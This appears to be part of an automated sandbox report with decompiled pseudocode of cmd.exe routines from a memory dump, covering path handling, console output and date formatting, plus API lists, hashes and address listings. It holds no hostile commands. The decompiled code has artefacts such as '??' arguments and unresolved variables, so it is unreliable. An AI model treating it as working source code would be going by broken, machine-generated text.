                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 011ECCDE
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: wcschr$File$_get_osfhandlememset$LockPointerShared$AcquireConsoleErrorLastReadReleaseSizeTitleType_wcsicmp_wcsnicmpiswspacetowupperwcsncmp
                                    • String ID:
                                    • API String ID: 1803274588-0
                                    • Opcode ID: 7db3bd28b2230f4c5a600131cbcbd2cf5bc0921d30300c7f7cfc2dfbedf93e7f
                                    • Instruction ID: 0c35c30fb05bcba58be69a9150dd9c28021f8f27148d60a098fc080ed59b1ad5
                                    • Opcode Fuzzy Hash: 7db3bd28b2230f4c5a600131cbcbd2cf5bc0921d30300c7f7cfc2dfbedf93e7f
                                    • Instruction Fuzzy Hash: 18C10831B00A1687DB3C9FECCC9C7BE77E5AF58714F054568E90A97280EBB09991C791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 60%
                                    			E011E4800(signed int __ecx, signed int __edx) {
                                    				intOrPtr _v8;
                                    				signed int _v16;
                                    				int _v28;
                                    				char _v32;
                                    				void* _v36;
                                    				void _v556;
                                    				int _v564;
                                    				char _v568;
                                    				void* _v572;
                                    				void _v1092;
                                    				char _v1093;
                                    				signed int _v1094;
                                    				signed int* _v1100;
                                    				signed int _v1104;
                                    				signed int* _v1108;
                                    				intOrPtr _v1112;
                                    				signed int _v1116;
                                    				intOrPtr _v1120;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t106;
                                    				intOrPtr _t123;
                                    				intOrPtr _t127;
                                    				intOrPtr _t132;
                                    				intOrPtr _t133;
                                    				intOrPtr _t135;
                                    				void* _t136;
                                    				signed int _t137;
                                    				intOrPtr _t138;
                                    				signed int _t143;
                                    				signed int _t144;
                                    				signed int _t145;
                                    				intOrPtr* _t146;
                                    				intOrPtr _t147;
                                    				void* _t148;
                                    				signed int _t153;
                                    				signed int _t154;
                                    				void* _t163;
                                    				intOrPtr* _t164;
                                    				intOrPtr* _t167;
                                    				intOrPtr* _t170;
                                    				signed int _t176;
                                    				signed int* _t177;
                                    				void* _t178;
                                    				intOrPtr* _t186;
                                    				void* _t190;
                                    				signed int _t192;
                                    				signed int _t196;
                                    				void* _t198;
                                    				intOrPtr* _t200;
                                    				void* _t201;
                                    				void* _t202;
                                    				intOrPtr _t203;
                                    				intOrPtr* _t204;
                                    				signed int* _t205;
                                    				signed int _t206;
                                    				signed int _t211;
                                    
                                    				_t191 = __edx;
                                    				_t154 = _t211;
                                    				_push(__ecx);
                                    				_push(__ecx);
                                    				_v8 =  *((intOrPtr*)(_t154 + 4));
                                    				_t209 = (_t211 & 0xfffffff8) + 4;
                                    				_t106 =  *0x11fd0b4; // 0x2833377e
                                    				_v16 = _t106 ^ (_t211 & 0xfffffff8) + 0x00000004;
                                    				_t200 =  *((intOrPtr*)(_t154 + 0xc));
                                    				_t196 = 0;
                                    				_v564 = 0x104;
                                    				_v1093 = __edx;
                                    				_v1116 = __ecx;
                                    				 *0x1213cf0 = 0;
                                    				_v572 = 0;
                                    				_v568 = 1;
                                    				memset( &_v1092, 0, 0x104);
                                    				_v36 = 0;
                                    				_v32 = 1;
                                    				_v28 = 0x104;
                                    				memset( &_v556, 0, 0x104);
                                    				_t156 =  &_v1092;
                                    				if(E011E0C70( &_v1092, 0x7fe9) < 0) {
                                    					L74:
                                    					if(_v1093 == 0) {
                                    						L14:
                                    						_t196 = 1;
                                    						L15:
                                    						__imp__??_V@YAXPAX@Z(_v36);
                                    						__imp__??_V@YAXPAX@Z(_v572);
                                    						_pop(_t198);
                                    						_pop(_t201);
                                    						return E011E6FD0(_t196, _t154, _v16 ^ _t209, _t191, _t198, _t201);
                                    					}
                                    					_push(_t196);
                                    					_push(0x2374);
                                    					L13:
                                    					E011DC5A2(_t156);
                                    					goto L14;
                                    				}
                                    				_t156 =  &_v556;
                                    				if(E011E0C70( &_v556, 0x7fe9) < 0) {
                                    					goto L74;
                                    				}
                                    				_t163 = 0x30;
                                    				_t164 = E011E00B0(_t163);
                                    				_v1108 = _t164;
                                    				if(_t164 == 0) {
                                    					L47:
                                    					E011F9287(_t164);
                                    					__imp__longjmp(0x120b8b8, 1);
                                    					L48:
                                    					_t165 = 0x1213ab0;
                                    					L17:
                                    					E011E0D89(_t191, _t165);
                                    					E011E5D39();
                                    					_t202 = _v572;
                                    					_t167 = _t202;
                                    					if(_t202 == 0) {
                                    						_t167 =  &_v1092;
                                    					}
                                    					_t191 = _t167 + 2;
                                    					do {
                                    						_t123 =  *_t167;
                                    						_t167 = _t167 + 2;
                                    					} while (_t123 != _t196);
                                    					_t156 = _t167 - _t191 >> 1;
                                    					_v1104 = _t156;
                                    					if(_t156 <= 3) {
                                    						L24:
                                    						if(_t156 + 1 > 0x7fe7) {
                                    							if(_v1093 == 0) {
                                    								goto L14;
                                    							}
                                    							_push(_t196);
                                    							_push(2);
                                    							goto L13;
                                    						}
                                    						_t203 = _v1120;
                                    						_t125 =  *(_t203 + 0x10);
                                    						if( *( *(_t203 + 0x10)) == _t196) {
                                    							_t125 = "*";
                                    						}
                                    						E011E0D89(_t191, _t125);
                                    						_t170 = _v36;
                                    						if(_t170 == 0) {
                                    							_t170 =  &_v556;
                                    						}
                                    						_t191 = _t170 + 2;
                                    						do {
                                    							_t127 =  *_t170;
                                    							_t170 = _t170 + 2;
                                    						} while (_t127 != _t196);
                                    						_t156 = _t170 - _t191 >> 1;
                                    						if(_v1104 + 1 + (_t170 - _t191 >> 1) > 0x7fe7) {
                                    							if(_v1093 == 0) {
                                    								goto L14;
                                    							}
                                    							_push(_t196);
                                    							_push(0x6f);
                                    							goto L13;
                                    						}
                                    						if( *( *(_t203 + 0x10)) == _t196) {
                                    							L33:
                                    							_t172 = _v36;
                                    							if(_v36 == 0) {
                                    								_t172 =  &_v556;
                                    							}
                                    							_t132 = E011E297B(_t172);
                                    							_t204 = _v1100;
                                    							 *_t204 = _t132;
                                    							_t173 = _v572;
                                    							if(_v572 == 0) {
                                    								_t173 =  &_v1092;
                                    							}
                                    							_t133 = E011E297B(_t173);
                                    							 *((intOrPtr*)(_t204 + 4)) = _t133;
                                    							_t205 = _v1108;
                                    							if(_t205[1] != _t196) {
                                    								__imp___wcsicmp(_t205[1], _t133);
                                    								if(_t133 == 0) {
                                    									_t205[2] = _t205[2] + 1;
                                    									_t176 = _v1100;
                                    									goto L38;
                                    								}
                                    								_t164 = 0x30;
                                    								_t205 = E011E00B0(_t164);
                                    								if(_t205 == 0) {
                                    									goto L47;
                                    								}
                                    								_v1108 = _t205;
                                    								 *_v1108 = _t205;
                                    								_t143 = E011E297B(_v1100[1]);
                                    								_t176 = _v1100;
                                    								_t205[1] = _t143;
                                    								 *_t205 = _t196;
                                    								_t144 =  *((intOrPtr*)(_t176 + 8));
                                    								_t205[2] = 1;
                                    								goto L37;
                                    							} else {
                                    								_t145 = E011E297B(_t133);
                                    								_t176 = _v1100;
                                    								_t205[1] = _t145;
                                    								_t144 =  *((intOrPtr*)(_t176 + 8));
                                    								L37:
                                    								_t205[3] = _t176;
                                    								_t205[4] = _t144;
                                    								L38:
                                    								_t191 = _v1116;
                                    								_t135 = _v1112 + 1;
                                    								_t177 =  *(_t176 + 0xc);
                                    								_v1112 = _t135;
                                    								_v1100 = _t177;
                                    								if(_t135 >  *((intOrPtr*)(_v1116 + 0x48))) {
                                    									goto L15;
                                    								}
                                    								L4:
                                    								_t206 =  *_t177;
                                    								_t192 = _t206;
                                    								_v1104 = _t206;
                                    								_t178 = _t192 + 2;
                                    								do {
                                    									_t136 =  *_t192;
                                    									_t192 = _t192 + 2;
                                    								} while (_t136 != _t196);
                                    								_t191 = _t192 - _t178 >> 1;
                                    								_t137 = E011E3121(_t206, _t192 - _t178 >> 1);
                                    								_v1094 = _t137;
                                    								if(_t137 != 0) {
                                    									L8:
                                    									_v1100[2] = _t137;
                                    									if( *((char*)(_t154 + 8)) != 0) {
                                    										_t191 = _t137;
                                    										_t206 = E011E4DB8(_t206, _t137);
                                    										E011E0040(_v1104);
                                    									}
                                    									_t156 = _t206;
                                    									 *0x1213cf0 = _t196;
                                    									_t138 = E011E3B5D(_t206, _t191);
                                    									_v1120 = _t138;
                                    									if(_t138 != 1) {
                                    										_t165 =  *0x1213cb8;
                                    										if( *0x1213cb8 == 0) {
                                    											goto L48;
                                    										}
                                    										goto L17;
                                    									} else {
                                    										if(_v1093 == 0) {
                                    											goto L14;
                                    										}
                                    										_push(_t196);
                                    										_push( *0x1213cf0);
                                    										goto L13;
                                    									}
                                    								}
                                    								_t156 =  *0x1213cf0;
                                    								if(_t156 != 0) {
                                    									if(_v1093 == 0) {
                                    										goto L14;
                                    									}
                                    									_push(_t196);
                                    									_push(_t156);
                                    									goto L13;
                                    								}
                                    								goto L8;
                                    							}
                                    						}
                                    						_t146 =  *((intOrPtr*)(_t203 + 0x14));
                                    						if(_t146 == 0 ||  *_t146 == _t196) {
                                    							_t186 = _v36;
                                    							if(_t186 == 0) {
                                    								_t186 =  &_v556;
                                    							}
                                    							_t191 = _t186 + 2;
                                    							do {
                                    								_t147 =  *_t186;
                                    								_t186 = _t186 + 2;
                                    							} while (_t147 != _t196);
                                    							_t148 = (_t186 - _t191 >> 1) + 3;
                                    							if(_v1094 != 0) {
                                    								if(_t148 <= 0x7fe7 &&  *((char*)(_t154 + 8)) != 0) {
                                    									E011E0CF2(_t191, L".*");
                                    								}
                                    							}
                                    						}
                                    						goto L33;
                                    					}
                                    					if(_v1094 != 0) {
                                    						_t190 = _t202;
                                    						if(_t202 == 0) {
                                    							_t190 =  &_v1092;
                                    						}
                                    						if( *((short*)(E011D5846(_t190))) != 0x2e) {
                                    							_t156 = _v1104;
                                    							goto L22;
                                    						} else {
                                    							if(_t202 == 0) {
                                    								_t202 =  &_v1092;
                                    							}
                                    							_t156 = _v1104;
                                    							 *((short*)(_t202 + _t156 * 2 - 4)) = 0;
                                    							goto L24;
                                    						}
                                    					}
                                    					L22:
                                    					if(_t202 == 0) {
                                    						_t202 =  &_v1092;
                                    					}
                                    					 *((short*)(_t202 + _t156 * 2 - 2)) = 0;
                                    					goto L24;
                                    				}
                                    				_t153 = _v1116;
                                    				 *_t200 = _t164;
                                    				_t191 = 1;
                                    				 *_t164 = 0;
                                    				 *((intOrPtr*)(_t164 + 4)) = 0;
                                    				 *((intOrPtr*)(_t164 + 8)) = 1;
                                    				_t177 = _t153 + 0x4c;
                                    				_v1112 = 1;
                                    				_v1100 = _t177;
                                    				if( *((intOrPtr*)(_t153 + 0x48)) < 1) {
                                    					goto L15;
                                    				}
                                    				goto L4;
                                    			}

                                    APIs
                                    • memset.MSVCRT ref: 011E4861
                                    • memset.MSVCRT ref: 011E4881
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E4991
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E499E
                                    • longjmp.MSVCRT(0120B8B8,00000001,00007FE9,00007FE9,?,?,?,?,00000000,?), ref: 011EE94C
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$Heap$AllocProcesslongjmp
                                    • String ID:
                                    • API String ID: 2656838167-0
                                    • Opcode ID: 5fb23863ef84f287cb4b93a009a850ece2e652e6b9bdc2f115d537b9a9d913b2
                                    • Instruction ID: a60e01ff0d5a996e948a621ff15948cbf00e643bf52fd4290830f50435c43733
                                    • Opcode Fuzzy Hash: 5fb23863ef84f287cb4b93a009a850ece2e652e6b9bdc2f115d537b9a9d913b2
                                    • Instruction Fuzzy Hash: ACD10374900A158BDB3DCF98C8987A9FBF5AF84704F0840DDDA4AA7681EB706E81CB55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 62%
                                    			E011DB6CB(void** __ecx, intOrPtr _a8) {
                                    				void _v8;
                                    				intOrPtr _v12;
                                    				void* _v16;
                                    				char _v20;
                                    				char _v76;
                                    				short _v332;
                                    				signed short _v342;
                                    				signed short _v344;
                                    				signed short _v346;
                                    				struct _SYSTEMTIME _v348;
                                    				int _v352;
                                    				int _v356;
                                    				intOrPtr _v360;
                                    				intOrPtr _v364;
                                    				void** _v368;
                                    				struct _FILETIME _v376;
                                    				struct _FILETIME _v384;
                                    				void _v420;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* _t96;
                                    				void* _t97;
                                    				void* _t103;
                                    				intOrPtr _t114;
                                    				void* _t115;
                                    				void** _t121;
                                    				void** _t122;
                                    				void* _t125;
                                    				void* _t126;
                                    				void* _t135;
                                    				void* _t136;
                                    				signed short _t143;
                                    				long _t153;
                                    				short* _t155;
                                    				void* _t161;
                                    				signed int _t164;
                                    				void* _t168;
                                    				void _t170;
                                    				void _t174;
                                    				intOrPtr _t184;
                                    				void* _t187;
                                    				void* _t192;
                                    				void** _t193;
                                    				signed int _t195;
                                    				signed int _t204;
                                    				int _t207;
                                    				void** _t215;
                                    				void** _t216;
                                    				signed int _t224;
                                    				signed int _t228;
                                    				void* _t229;
                                    				void* _t232;
                                    				void* _t238;
                                    				void* _t240;
                                    				intOrPtr _t248;
                                    				signed int _t253;
                                    				void* _t258;
                                    				void* _t259;
                                    				void* _t260;
                                    				void* _t263;
                                    				void* _t264;
                                    				signed int _t265;
                                    				void* _t266;
                                    
                                    				_t193 = __ecx;
                                    				if( *(__ecx + 8) != 0) {
                                    					_t97 = E011E269C(_t96);
                                    					_t260 =  *(__ecx + 0x10);
                                    					if(_t97 == 0) {
                                    						if(E011E27C8( *(__ecx + 8) +  *(__ecx + 8), _t260,  *(__ecx + 8) +  *(__ecx + 8),  &_v20) == 0) {
                                    							goto L59;
                                    						} else {
                                    							_t179 =  *(__ecx + 8);
                                    							_t101 =  *(__ecx + 8) + _t179;
                                    							if(_v20 >=  *(__ecx + 8) + _t179) {
                                    								goto L35;
                                    							} else {
                                    								goto L59;
                                    							}
                                    						}
                                    					} else {
                                    						_t184 = _t260 +  *(__ecx + 8) * 2;
                                    						_v12 = _t184;
                                    						if(_t260 < _t184) {
                                    							_t238 = 0x2022;
                                    							while(1) {
                                    								_t259 = _t260;
                                    								if(_t260 >= _t184) {
                                    									goto L35;
                                    								}
                                    								while( *_t259 != _t238) {
                                    									_t259 = _t259 + 2;
                                    									if(_t259 < _t184) {
                                    										continue;
                                    									}
                                    									break;
                                    								}
                                    								if(_t259 == _t260) {
                                    									goto L48;
                                    								} else {
                                    									_t192 = _t259 - _t260 >> 1;
                                    									_v16 = _t192;
                                    									__imp___get_osfhandle(0);
                                    									if(WriteConsoleW(_t192, 1, _t260, _t192,  &_v8) == 0) {
                                    										L59:
                                    										_t202 = 1;
                                    										if(E011E0178(_t101) == 0) {
                                    											_t202 = 1;
                                    											_t103 = E011F9953(_t102, 1);
                                    											if(_t103 == 0) {
                                    												_push(_t103);
                                    												_push(0x70);
                                    												goto L63;
                                    											}
                                    										} else {
                                    											_push(0);
                                    											_push(0x1d);
                                    											L63:
                                    											E011DC5A2(_t202);
                                    											_pop(_t202);
                                    										}
                                    										E011F9287(_t202);
                                    										__imp__longjmp(0x120b8b8, 1);
                                    										asm("int3");
                                    										_t204 = 9;
                                    										memcpy( &_v420, _t260, _t204 << 2);
                                    										_t266 = _t266 + 0xc;
                                    										E011F3C49( &_v420,  &_v376);
                                    										FileTimeToLocalFileTime( &_v376,  &_v384);
                                    										FileTimeToSystemTime( &_v384,  &_v348);
                                    										_v352 = 0;
                                    										if( *0x1213cc9 == 0) {
                                    											_t245 = _v348 & 0x0000ffff;
                                    											_t261 = _v346 & 0x0000ffff;
                                    											_t258 = _v342 & 0x0000ffff;
                                    											_v352 = _t245;
                                    											if(_v364 == 0) {
                                    												_t224 = 0x64;
                                    												_t245 = _t245 % _t224;
                                    												_v352 = _t245;
                                    											}
                                    											_t114 =  *0x11fd540; // 0x0
                                    											if(_t114 != 2) {
                                    												if(_t114 == 1) {
                                    													_t135 = _t261;
                                    													_t261 = _t258;
                                    													_t258 = _t135;
                                    												}
                                    											} else {
                                    												_t136 = _t245;
                                    												_t245 = _t258;
                                    												_t258 = _t261;
                                    												_v352 = _t245;
                                    												_t261 = _t136;
                                    											}
                                    											_t207 =  *0x11fd598; // 0x0
                                    											if(_t207 >= 0x20) {
                                    												_t115 =  *0x11fd594; // 0x0
                                    												goto L92;
                                    											} else {
                                    												_t115 = realloc( *0x11fd594, 0x40);
                                    												_pop(0);
                                    												if(_t115 != 0) {
                                    													_t245 = _v352;
                                    													_t207 = 0x20;
                                    													 *0x11fd594 = _t115;
                                    													 *0x11fd598 = _t207;
                                    													L92:
                                    													_push(_t245);
                                    													_push(0x11ff80c);
                                    													_push(_t258);
                                    													_push(0x11ff80c);
                                    													E011E274C(_t115, _t207, L"%02d%s%02d%s%02d", _t261);
                                    													_t266 = _t266 + 0x20;
                                    													_t258 = 2;
                                    													goto L34;
                                    												} else {
                                    													_push(_t115);
                                    													goto L79;
                                    												}
                                    											}
                                    										} else {
                                    											_v356 = 0;
                                    											if(GetLocaleInfoW(E011E41A4(), 0x1f,  &_v332, 0x80) == 0) {
                                    												_t245 = 0x80;
                                    												E011E1040( &_v332, 0x80,  *0x11ff7f8);
                                    											}
                                    											_t143 = _v332;
                                    											_t263 =  &_v332;
                                    											_t258 = 2;
                                    											if(_t143 != 0) {
                                    												_t195 = _v356;
                                    												_t228 = _t143 & 0x0000ffff;
                                    												_t161 = 0x64;
                                    												do {
                                    													if(_t228 == 0x27) {
                                    														_t263 = _t263 + _t258;
                                    														_t195 = 0 | _t195 == 0x00000000;
                                    													} else {
                                    														if(_t195 != 0 || _t228 != _t161 && _t228 != 0x4d) {
                                    															_t263 = _t263 + _t258;
                                    														} else {
                                    															_t253 = 0;
                                    															do {
                                    																_t263 = _t263 + _t258;
                                    																_t253 = 1 + _t253;
                                    															} while ( *_t263 == _t228);
                                    															_v356 = _t263;
                                    															_t264 = _t263 +  ~_t253 * 2;
                                    															if(_t253 != 1) {
                                    																_t168 = 0x64;
                                    																if(_t228 == _t168) {
                                    																	_v360 = 0;
                                    																}
                                    																if(_t253 <= 3) {
                                    																	_t263 = _v356;
                                    																} else {
                                    																	_t245 = _v356;
                                    																	_t229 = _t245;
                                    																	_v356 = _t229 + 2;
                                    																	do {
                                    																		_t170 =  *_t229;
                                    																		_t229 = _t229 + _t258;
                                    																	} while (_t170 != _v352);
                                    																	_t263 = _t264 + 6;
                                    																	memmove(_t263, _t245, 2 + (_t229 - _v356 >> 1) * 2);
                                    																	_t266 = _t266 + 0xc;
                                    																}
                                    															} else {
                                    																_t232 = _t264;
                                    																_t245 = _t232 + 2;
                                    																do {
                                    																	_t174 =  *_t232;
                                    																	_t232 = _t232 + _t258;
                                    																} while (_t174 != _v352);
                                    																memmove(_t264 + 2, _t264, 2 + (_t232 - _t245 >> 1) * 2);
                                    																_t266 = _t266 + 0xc;
                                    																_t263 = _t264 + 4;
                                    															}
                                    														}
                                    													}
                                    													_t164 =  *_t263 & 0x0000ffff;
                                    													_t228 = _t164;
                                    													_t161 = 0x64;
                                    												} while (_t164 != 0);
                                    												_t193 = _v368;
                                    											}
                                    											if(GetDateFormatW(E011E41A4(), 0,  &_v348,  &_v332,  *0x11fd594,  *0x11fd598) == 0) {
                                    												L31:
                                    												_t261 = GetDateFormatW(E011E41A4(), 0,  &_v348,  &_v332, 0, 0);
                                    												if(_t261 == 0) {
                                    													_t153 = GetLastError();
                                    													_push(0);
                                    													goto L77;
                                    												} else {
                                    													_t261 = _t261 + 1;
                                    													_t155 = realloc( *0x11fd594, _t261 + _t261);
                                    													_pop(0);
                                    													if(_t155 == 0) {
                                    														_push(0);
                                    														L79:
                                    														_push(8);
                                    														goto L80;
                                    													} else {
                                    														 *0x11fd594 = _t155;
                                    														 *0x11fd598 = _t261;
                                    														_t261 = 0;
                                    														if(GetDateFormatW(E011E41A4(), 0,  &_v348,  &_v332, _t155, 0) == 0) {
                                    															_t153 = GetLastError();
                                    															_push(0);
                                    															L77:
                                    															 *0x1213cf0 = _t153;
                                    															_push(_t153);
                                    															L80:
                                    															E011DC5A2(0);
                                    															_t122 = 0;
                                    														} else {
                                    															L34:
                                    															_t261 =  *0x11fd594; // 0x0
                                    															goto L14;
                                    														}
                                    													}
                                    												}
                                    											} else {
                                    												_t261 =  *0x11fd594; // 0x0
                                    												if(_t261 == 0) {
                                    													goto L31;
                                    												} else {
                                    													L14:
                                    													_push(E011D5AA7(_v344 & 0x0000ffff));
                                    													_t245 = 0x20;
                                    													E011E1040( &_v76, _t245);
                                    													if(_t193 == 0) {
                                    														if(_v360 != 0) {
                                    															if(E011D68B5() == 0) {
                                    																_push(_t261);
                                    																_push( &_v76);
                                    															} else {
                                    																_push( &_v76);
                                    																_push(_t261);
                                    															}
                                    															_t121 = E011E25D9(L"%s %s ");
                                    														} else {
                                    															_push(_t261);
                                    															_t121 = E011E25D9(L"%s ");
                                    														}
                                    														_t193 = _t121;
                                    													} else {
                                    														if(_v360 == 0 || _v364 != 1) {
                                    															E011E1040(_t193, _a8, _t261);
                                    														} else {
                                    															_t126 = E011D68B5();
                                    															_t248 = _a8;
                                    															_t216 = _t193;
                                    															if(_t126 != 0) {
                                    																E011E1040(_t216, _t248, _t261);
                                    																E011E18C0(_t193, _a8, " ");
                                    																_push( &_v76);
                                    															} else {
                                    																E011E1040(_t216, _t248,  &_v76);
                                    																E011E18C0(_t193, _a8, " ");
                                    																_push(_t261);
                                    															}
                                    															E011E18C0(_t193, _a8);
                                    														}
                                    														_t215 =  &(_t193[0]);
                                    														_t245 = 0;
                                    														do {
                                    															_t125 =  *_t193;
                                    															_t193 = _t193 + _t258;
                                    														} while (_t125 != 0);
                                    														_t193 = _t193 - _t215 >> 1;
                                    													}
                                    													_t122 = _t193;
                                    												}
                                    											}
                                    										}
                                    										return E011E6FD0(_t122, _t193, _v8 ^ _t265, _t245, _t258, _t261);
                                    									} else {
                                    										_t101 = _v16;
                                    										if(_v8 != _v16) {
                                    											goto L59;
                                    										} else {
                                    											_t184 = _v12;
                                    											_t260 = _t259;
                                    											_t238 = 0x2022;
                                    											L48:
                                    											while(_t259 < _t184) {
                                    												if( *_t259 == _t238) {
                                    													_t259 = _t259 + 2;
                                    													continue;
                                    												}
                                    												break;
                                    											}
                                    											if(_t259 == _t260) {
                                    												L55:
                                    												_t238 = 0x2022;
                                    												if(_t260 < _t184) {
                                    													continue;
                                    												} else {
                                    													goto L35;
                                    												}
                                    											} else {
                                    												if( *_t193 != 0) {
                                    													SetConsoleMode( *_t193, 2);
                                    												}
                                    												_t187 = _t259 - _t260 >> 1;
                                    												_v16 = _t187;
                                    												__imp___get_osfhandle(_t260, _t187,  &_v8, 0);
                                    												_t240 = 1;
                                    												_t260 = WriteConsoleW(_t187, ??, ??, ??, ??);
                                    												_t101 = E011E06C0(_t240);
                                    												if(_t260 == 0) {
                                    													goto L59;
                                    												} else {
                                    													_t101 = _v16;
                                    													if(_v8 != _v16) {
                                    														goto L59;
                                    													} else {
                                    														_t184 = _v12;
                                    														_t260 = _t259;
                                    														goto L55;
                                    													}
                                    												}
                                    											}
                                    										}
                                    									}
                                    								}
                                    								goto L102;
                                    							}
                                    						}
                                    						goto L35;
                                    					}
                                    				} else {
                                    					L35:
                                    					_t193[1] = _t193[1] + E011DBED7(_t193, _t193[4]);
                                    					 *(_t193[4]) = 0;
                                    					_t193[2] = _t193[2] & 0;
                                    					return 0;
                                    				}
                                    				L102:
                                    			}
                                    0x011e9b7a
                                    0x011e9b7a
                                    0x011d5cff
                                    0x011d5cff
                                    0x011d5d01
                                    0x011d5d04
                                    0x011d5d04
                                    0x011d5d07
                                    0x011d5d09
                                    0x011d5d23
                                    0x011d5d29
                                    0x011d5d2c
                                    0x011d5d2c
                                    0x011d5cf9
                                    0x011d5bdd
                                    0x011d5bf4
                                    0x011d5bf9
                                    0x011d5bfe
                                    0x011d5bfe
                                    0x011d5c01
                                    0x011d5c01
                                    0x011d5c32
                                    0x011d5d34
                                    0x011d5d53
                                    0x011d5d57
                                    0x011e9b8d
                                    0x011e9b95
                                    0x00000000
                                    0x011d5d5d
                                    0x011d5d5d
                                    0x011d5d68
                                    0x011d5d6f
                                    0x011d5d72
                                    0x011e9ba9
                                    0x011e9baa
                                    0x011e9baa
                                    0x00000000
                                    0x011d5d78
                                    0x011d5d7a
                                    0x011d5d8c
                                    0x011d5d93
                                    0x011d5da4
                                    0x011e9b98
                                    0x011e9b9e
                                    0x011e9b9f
                                    0x011e9b9f
                                    0x011e9ba4
                                    0x011e9bac
                                    0x011e9bac
                                    0x011e9bb3
                                    0x011d5daa
                                    0x011d5daa
                                    0x011d5daa
                                    0x00000000
                                    0x011d5daa
                                    0x011d5da4
                                    0x011d5d72
                                    0x011d5c38
                                    0x011d5c38
                                    0x011d5c40
                                    0x00000000
                                    0x011d5c46
                                    0x011d5c46
                                    0x011d5c52
                                    0x011d5c55
                                    0x011d5c59
                                    0x011d5c60
                                    0x011e9c79
                                    0x011e9c94
                                    0x011e9c9a
                                    0x011e9c9b
                                    0x011e9c96
                                    0x011e9c96
                                    0x011e9c97
                                    0x011e9c97
                                    0x011e9ca1
                                    0x011e9c7b
                                    0x011e9c7b
                                    0x011e9c81
                                    0x011e9c87
                                    0x011e9ca9
                                    0x011d5c66
                                    0x011d5c6d
                                    0x011e9cd4
                                    0x011d5c80
                                    0x011d5c80
                                    0x011d5c85
                                    0x011d5c88
                                    0x011d5c8c
                                    0x011e9cb1
                                    0x011e9cc0
                                    0x011e9cc8
                                    0x011d5c92
                                    0x011d5c96
                                    0x011d5ca5
                                    0x011d5caa
                                    0x011d5caa
                                    0x011d5cb0
                                    0x011d5cb0
                                    0x011d5cb5
                                    0x011d5cb8
                                    0x011d5cba
                                    0x011d5cba
                                    0x011d5cbd
                                    0x011d5cbf
                                    0x011d5cc6
                                    0x011d5cc6
                                    0x011d5cc8
                                    0x011d5cc8
                                    0x011d5c40
                                    0x011d5c32
                                    0x011d5cda
                                    0x011e99ff
                                    0x011e99ff
                                    0x011e9a05
                                    0x00000000
                                    0x011e9a0b
                                    0x011e9a0b
                                    0x011e9a0e
                                    0x011e9a10
                                    0x00000000
                                    0x011e9a1f
                                    0x011e9a1a
                                    0x011e9a1c
                                    0x00000000
                                    0x011e9a1c
                                    0x00000000
                                    0x011e9a1a
                                    0x011e9a25
                                    0x011e9a6f
                                    0x011e9a6f
                                    0x011e9a76
                                    0x00000000
                                    0x011e9a7c
                                    0x00000000
                                    0x011e9a7c
                                    0x011e9a27
                                    0x011e9a2a
                                    0x011e9a30
                                    0x011e9a30
                                    0x011e9a40
                                    0x011e9a46
                                    0x011e9a49
                                    0x011e9a4f
                                    0x011e9a57
                                    0x011e9a59
                                    0x011e9a60
                                    0x00000000
                                    0x011e9a62
                                    0x011e9a62
                                    0x011e9a68
                                    0x00000000
                                    0x011e9a6a
                                    0x011e9a6a
                                    0x011e9a6d
                                    0x00000000
                                    0x011e9a6d
                                    0x011e9a68
                                    0x011e9a60
                                    0x011e9a25
                                    0x011e9a05
                                    0x011e99f9
                                    0x00000000
                                    0x011e99d4
                                    0x011e99bc
                                    0x00000000
                                    0x011e99b1
                                    0x011db6e2
                                    0x011db6e2
                                    0x011db6ec
                                    0x011db6f6
                                    0x011db6f9
                                    0x011db702
                                    0x011db702
                                    0x00000000

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011E99E9
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 011E99F1
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 011E9A30
                                    • _get_osfhandle.MSVCRT ref: 011E9A49
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 011E9A51
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
